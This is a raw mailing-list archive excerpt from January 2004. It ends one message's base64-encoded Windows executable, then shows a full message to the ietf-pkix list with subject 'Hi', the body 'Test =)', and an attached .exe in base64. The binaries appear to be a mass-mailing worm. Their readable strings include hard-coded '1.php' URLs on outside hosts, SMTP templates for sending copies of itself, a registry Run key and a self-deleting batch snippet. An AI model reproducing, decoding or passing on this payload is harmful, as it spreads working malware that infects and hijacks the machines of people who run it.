cHJpbnRmQQB1c2VyMzIuZGxsAAAhAFdTQVN0YXJ0dXAAACQAYWNjZXB0AAAlAGJpbmQAACYA Y2xvc2Vzb2NrZXQAJwBjb25uZWN0ACoAZ2V0aG9zdGJ5bmFtZQArAGdldGhvc3RuYW1lADYA aW5ldF9hZGRyADoAbGlzdGVuAAA+AHJlY3YAAEMAc2VsZWN0AABEAHNlbmQAAEkAc29ja2V0 AAB3c29jazMyLmRsbAAxAENvSW5pdGlhbGl6ZQAAawBDcmVhdGVTdHJlYW1PbkhHbG9iYWwA b2xlMzIuZGxsANcAU3RyRHVwQQDmAFN0clJDaHJBAADzAFN0clN0cklBAAD6AFN0clRyaW1B AABzaGx3YXBpLmRsbABpAEludGVybmV0Q2xvc2VIYW5kbGUAewBJbnRlcm5ldEdldENvbm5l Y3RlZFN0YXRlAIYASW50ZXJuZXRPcGVuQQCHAEludGVybmV0T3BlblVybEEAAHdpbmluZXQu ZGxsAIABUmVnQ2xvc2VLZXkAgwFSZWdDcmVhdGVLZXlBAKMBUmVnUXVlcnlWYWx1ZUV4QQAA rgFSZWdTZXRWYWx1ZUV4QQAAYWR2YXBpMzIuZGxsAAAqAEdldE5ldHdvcmtQYXJhbXMAAGlw aGxwYXBpLmRsbAAAbgBTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMTIAeRoAADE1MS4yMDEuMC4zOQAAAAAA AAAAAC53YWIALnR4dAAuaHRtAC5odG1sAAAucjEAQGhvdG1haWwuY29tAEBtc24uY29tAEBt aWNyb3NvZnQAQGF2cC4AACVzP3A9JWx1JmlkPSVzAGh0dHA6Ly93d3cuZWxyYXNzaG9wLmRl LzEucGhwAGh0dHA6Ly93d3cuaXQtbXNjLmRlLzEucGhwAGh0dHA6Ly93d3cuZ2V0eW91cmZy ZWUubmV0LzEucGhwAGh0dHA6Ly93d3cuZG1kZXNpZ24uZGUvMS5waHAAaHR0cDovLzY0LjE3 Ni4yMjguMTMvMS5waHAAaHR0cDovL3d3dy5sZW9uemVybml0c2t5LmNvbS8xLnBocABodHRw Oi8vMjE2Ljk4LjEzNi4yNDgvMS5waHAAaHR0cDovLzIxNi45OC4xMzQuMjQ3LzEucGhwAGh0 dHA6Ly93d3cuY2Ryb21jYS5jb20vMS5waHAAaHR0cDovL3d3dy5rdW5zdC1pbi10ZW1wbGlu LmRlLzEucGhwAGh0dHA6Ly92aXB3ZWIucnUvMS5waHAAaHR0cDovL2FudG9sLWNvLnJ1LzEu cGhwAGh0dHA6Ly93d3cuYmFncy1kb3N0YXZrYS5tYWdzLnJ1LzEucGhwAGh0dHA6Ly93d3cu NXgxMi5ydS8xLnBocABodHRwOi8vYm9zZS1hdWRpby5uZXQvMS5waHAAaHR0cDovL3d3dy5z dHRuZ2RhdGEuZGUvMS5waHAAaHR0cDovL3doOS50dS1kcmVzZGVuLmRlLzEucGhwAGh0dHA6 Ly93d3cubWljcm9udWtlLm5ldC8xLnBocABodHRwOi8vd3d3LnN0YWR0aGFnZW4ub3JnLzEu cGhwAGh0dHA6Ly93d3cuYmVhc3R5LWNhcnMuZGUvMS5waHAAaHR0cDovL3d3dy5wb2xvaGV4 ZS5kZS8xLnBocABodHRwOi8vd3d3LmJpbm84OC5kZS8xLnBocABodHRwOi8vd3d3LmdyZWZy YXRocGFlbnouZGUvMS5waHAAaHR0cDovL3d3dy5iaGFtaWR5LmRlLzEucGhwAGh0dHA6Ly93 d3cubXlzdGljLXZ3cy5kZS8xLnBocABodHRwOi8vd3d3LmF1dG8taG9iYnktZXNzZW4uZGUv MS5waHAAaHR0cDovL3d3dy5wb2xvemlja2UuZGUvMS5waHAAaHR0cDovL3d3dy50d3ItbXVz aWMuZGUvMS5waHAAaHR0cDovL3d3dy5zYy1lcmJlbmRvcmYuZGUvMS5waHAAaHR0cDovL3d3 dy5tb250YW5pYS5kZS8xLnBocABodHRwOi8vd3d3Lm1lZGktbWFydGluLmRlLzEucGhwAGh0 dHA6Ly92dmNnbi5kZS8xLnBocABodHRwOi8vd3d3LmJhbGxvbmZvdG8uY29tLzEucGhwAGh0 dHA6Ly93d3cubWFyZGVyLWdtYmguZGUvMS5waHAAaHR0cDovL3d3dy5kdmQtZmlsbWUuY29t LzEucGhwAGh0dHA6Ly93d3cuc21lYW5nb2wuY29tLzEucGhwAABEYXRlOiAlcw0KVG86ICVz DQpTdWJqZWN0OiBIaQ0KRnJvbTogJXMNCk1lc3NhZ2UtSUQ6IDwlcyVzPg0KTUlNRS1WZXJz aW9uOiAxLjANCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L21peGVkOw0KICAgICAgICBib3Vu ZGFyeT0iLS0tLS0tLS0lcyINCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiB0ZXh0 L3BsYWluOyBjaGFyc2V0PSJ1cy1hc2NpaSINCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6 IDdiaXQNCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LW1z ZG93bmxvYWQ7IG5hbWU9IlslJVJBTkQlJV0uZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNv ZGluZzogYmFzZTY0DQpDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFt ZT0iWyUlUkFORCUlXS5leGUiDQoNCgANCg0KLS0tLS0tLS0tLSVzLS0NCg0KLg0KACBUZXN0 ID0pDQpbJVJBTkQlXVslUkFORCVdDQotLQ0KVGVzdCwgeWVwLg0KOmwNCmRlbCAlMQ0KaWYg ZXhpc3QgJTEgZ290byBsDQpkZWwgJTAAYS5iYXQAb3BlbgBxAgAAzQ0BAAAAAAAAAAAAAAAA AAAAAAAAAAAAY2FsYy5leGUAb3BlbgBTT0ZUV0FSRVxXaW5kb3dzOTgAdWlkAFNPRlRXQVJF XE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bgBkM2R1cGRhdGUuZXhlAFxi YmVhZ2xlLmV4ZQBmcnVuAAAAAAAAAAAAAAAAAAAsACAsDQoAPAA+AENDOiAAQkNDOgBUbzog AEhFTE8gJXMNCgBSU0VUDQoATUFJTCBGUk9NOjwlcz4NCgBSQ1BUIFRPOjwlcz4NCgBEQVRB DQoAWyVSQU5EJV0AZGRkJywnIGRkIE1NTSB5eXl5IABISDptbTpzcyAAJTAzaSUwMmkADQpc ACouKgBiZWFnbGVfYmVhZ2xlAFxic3VwbGQAIC11cGQALmV4ZQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAgADAAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACA AAAAAAAAAAAAAAAAAAABAAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAA AAAAAAAAAAABAAAAAACQAAAAoJAAAOgCAAAAAAAAAAAAAIiTAAAUAAAAAAAAAAAAAAAoAAAA IAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAICAAIAA AACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////ABERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER EREREREREREREREREREREREREQAAAAAAAAAAAAAAAAAAARZkREREREREREREREREREAW5mZm ZmZmZmZmZmZmZmZAFvZgAGAAYABgAGAAAABmQBbmb3BvcG9wb3Bvd3dwZkAW9m/wb/Bv8G/w b///8GZAFuZmZmZmZmZmZmZmZmZmQBb2YABgAGAAYABgAGAAZkAW5m9wb3BvcG9wb3BvcGZA FvZv8G/wb/Bv8G/wb/BmQBbmZmZmZmZmZmZmZmZmZkAW9mAAYABgAGAAYABgAGZAFuZvcG9w b3BvcG9wb3BmQBb2b/Bv8G/wb/Bv8G/wZkAW5mZmZmZmZmZmZmZmZmZAFvZgd3d3d3d3d2Zm ZmZmQBbmYP////////dmZmZmZkAW9mB3d3d3d3d3ZmZmZmZAFuZgAAAAAAAAAGZmZmZmQBb+ /v7+/v7+/v7+/v7+/kARZmZmZmZmZmZmZmZmZmZhERERERERERERERERERERERERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER ERERERERERERERERERERERER///////////////////////////AAAABgAAAAIAAAACAAAAA gAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAA AACAAAAAgAAAAMAAAAH///////////////////////////////8AAAEAAQAgIBAAAQAEAOgC AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= ----------613547131643413-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0J2s8ib002795; Sun, 18 Jan 2004 18:54:08 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0J2s8KH002794; Sun, 18 Jan 2004 18:54:08 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ND1311 (202-145-70-77.adsl.ttn.net [202.145.70.77]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0J2rvic002779 for <ietf-pkix@imc.org>; Sun, 18 Jan 2004 18:54:01 -0800 (PST) (envelope-from smb@research.att.com) Date: Mon, 19 Jan 2004 10:51:38 +0800 To: ietf-pkix@imc.org Subject: Hi From: smb@research.att.com Message-ID: <ptfojsnrxqfolqcrsaf@research.att.com> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="--------275526655180024" Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> ----------275526655180024 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Test =) duqspmijwbtwsl -- Test, yep. ----------275526655180024 Content-Type: application/x-msdownload; name="ieeb.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="ljjfp.exe" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g RE9TIG1vZGUuDQ0KJAAAAAAAAADchu8bmOeBSJjngUiY54FImOeBSJvngUgW+JJIxeeBSGTH k0iZ54FIX+GHSJnngUhSaWNomOeBSAAAAAAAAAAAAAAAAAAAAABQRQAATAEEAN9uCkAAAAAA AAAAAOAADwELAQUMACQAAABCAAAAAAAAijEAAAAQAAAAQAAAAABAAAAQAAAAAgAABAAAAAAA AAAEAAAAAAAAAACgAAAABAAAOScBAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAA AAAAADhBAADIAAAAAJAAAKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAOAEAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAGJlYWdsZQAAhiMAAAAQAAAAJAAAAAQAAAAAAAAAAAAAAAAAACAA AGAucmRhdGEAANQHAAAAQAAAAAgAAAAoAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABONQAA AFAAAAAKAAAAMAAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAAoAMAAACQAAAABAAAADoAAAAA AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 